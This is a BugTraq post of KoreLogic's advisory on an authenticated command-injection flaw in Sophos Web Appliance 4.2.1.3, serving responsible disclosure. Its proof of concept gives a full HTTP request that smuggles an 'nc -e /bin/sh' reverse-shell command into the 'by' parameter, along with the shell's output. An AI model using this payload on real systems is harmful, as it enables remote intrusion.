BugTraq
KL-001-2016-009 : Sophos Web Appliance Remote Code Execution Nov 04 2016 03:13PM
KoreLogic Disclosures (disclosures korelogic com)
KL-001-2016-009 : Sophos Web Appliance Remote Code Execution

Title: Sophos Web Appliance Remote Code Execution
Advisory ID: KL-001-2016-009
Publication Date: 2016.11.03
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-009.txt

1. Vulnerability Details

Affected Vendor: Sophos
Affected Product: Web Apppliance
Affected Version: v4.2.1.3
Platform: Embedded Linux
CWE Classification: CWE-78: Improper Neutralization of Special Elements
used in an OS Command ('OS Command Injection'),
CWE-88: Argument Injection or Modification
Impact: Remote Code Execution
Attack vector: HTTP

2. Vulnerability Description

An authenticated user of any privilege can execute arbitrary
system commands as the non-root webserver user.

3. Technical Description

Multiple parameters to the web interface are unsafely handled and
can be used to run operating system commands, such as:

POST /index.php?c=logs HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0)
Gecko/20100101 Firefox/46.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 305
Connection: close

STYLE=590fca17b230e8cdba0394cfa28ef2eb&period=today&xperiod=&sb_xperiod=
xdays&startDate=&txt_time_start=12%3A00%20AM&endDate=&txt_time_end=11%3A
59%20PM&txt_filter_user_timeline=test&action=search&by=user_timeline`nc%
20-e%20/bin/sh%20[redacted]%209191`&search=test&sort=time&multiplier=1&s
tart=&end=&direction=1

HTTP/1.1 200 OK
Date: Tue, 10 May 2016 15:35:05 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0,
pre-check=0
Pragma: no-cache
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 207

{"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10
4:35
PM","filter":"test","recordsDisplayed":0,"recordsTotal":0,"data":[],"sta
rtDateBeforeData":false,"earliestRecord":"1970\/01\/01"}

--

The vulnerable parameters are: by, request_id, and txt_filter_domain

That request launches the following process on the SWA:

1000 16851 0.0 0.0 2728 1040 ? S 15:43 0:00 sh -c
/opt/perl/bin/salp-generate-report.pl --report=Filter --res=-
--type=user_timeline`nc -e /bin/sh [redacted] 9191` --filter='dGVzdA=='
--start='2016/05/10' --end='2016/05/10' --action=''
--sid=590fca17b230e8cdba0394cfa28ef2eb

From the shell launched via netcat:

id;uname -a;uptime
uid=1000(spiderman) gid=1000(spiderman)
groups=1000(spiderman),16(cron),44(tproxyd),45(wdx)
Linux please 3.2.57 #1 SMP Fri Feb 19 18:30:36 UTC 2016 i686 GNU/Linux
15:52:34 up 4:26, 0 users, load average: 0.11, 0.12, 0.15

4. Mitigation and Remediation Recommendation

The vendor has issued a fix for this vulnerability in Version
4.3 of SWA. Release notes available at:

http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.html

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.

6. Disclosure Timeline

2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos
2016.09.14 - Sophos requests KoreLogic re-send vulnerability details.
2016.09.28 - KoreLogic requests status update.
2016.09.28 - Sophos informs KoreLogic that an update including a fix
for this vulnerability will be available near the end
of October.
2016.10.13 - Sophos informs KoreLogic that the update was released to a
limited customer base and is expected to be distributed
at-large over the following week.
2016.11.03 - Public disclosure.

7. Proof of Concept

See 3. Technical Description.

The contents of this advisory are copyright(c) 2016
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Poli
cy.v2.2.txt

-----BEGIN PGP SIGNATURE-----

iQE3BAEBCAAhBQJYHKWAGhxkaXNjbG9zdXJlc0Brb3JlbG9naWMuY29tAAoJEE1l
miwOGYkMmk0H/06L6ou5RDouUSywzvVCpy5/qrKi1eBjZ7fnXmYWuIVnkbF3aOXj
U4IKWKGltemd4gwnnvd8Wpwi2YLl8ysG/ypyVwsGO9HsL3Vkj2344+iZKm4K/V4j
xDZo6gU94LKewMXsfucd9LvfhB7h+nIXVG8XFLYOi1Dt3clv0eCaLxjORXMdMvvz
iNrpdnV7A0A8XuoMsVA8uVUSkEQCxsPDe7XR8K2kSiEFUPb18AsFMqw4yS5SKqM2
MJVjXwCWAdknZ/hT/O4+IAU3DYqs0wJNDjaz0xusva0mfmwPtRs+J5Z2u0ZFb3tG
iFb1PoXEKw7VzoMe4qav493wFPu0sz8ZM7s=
=Rh2v
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus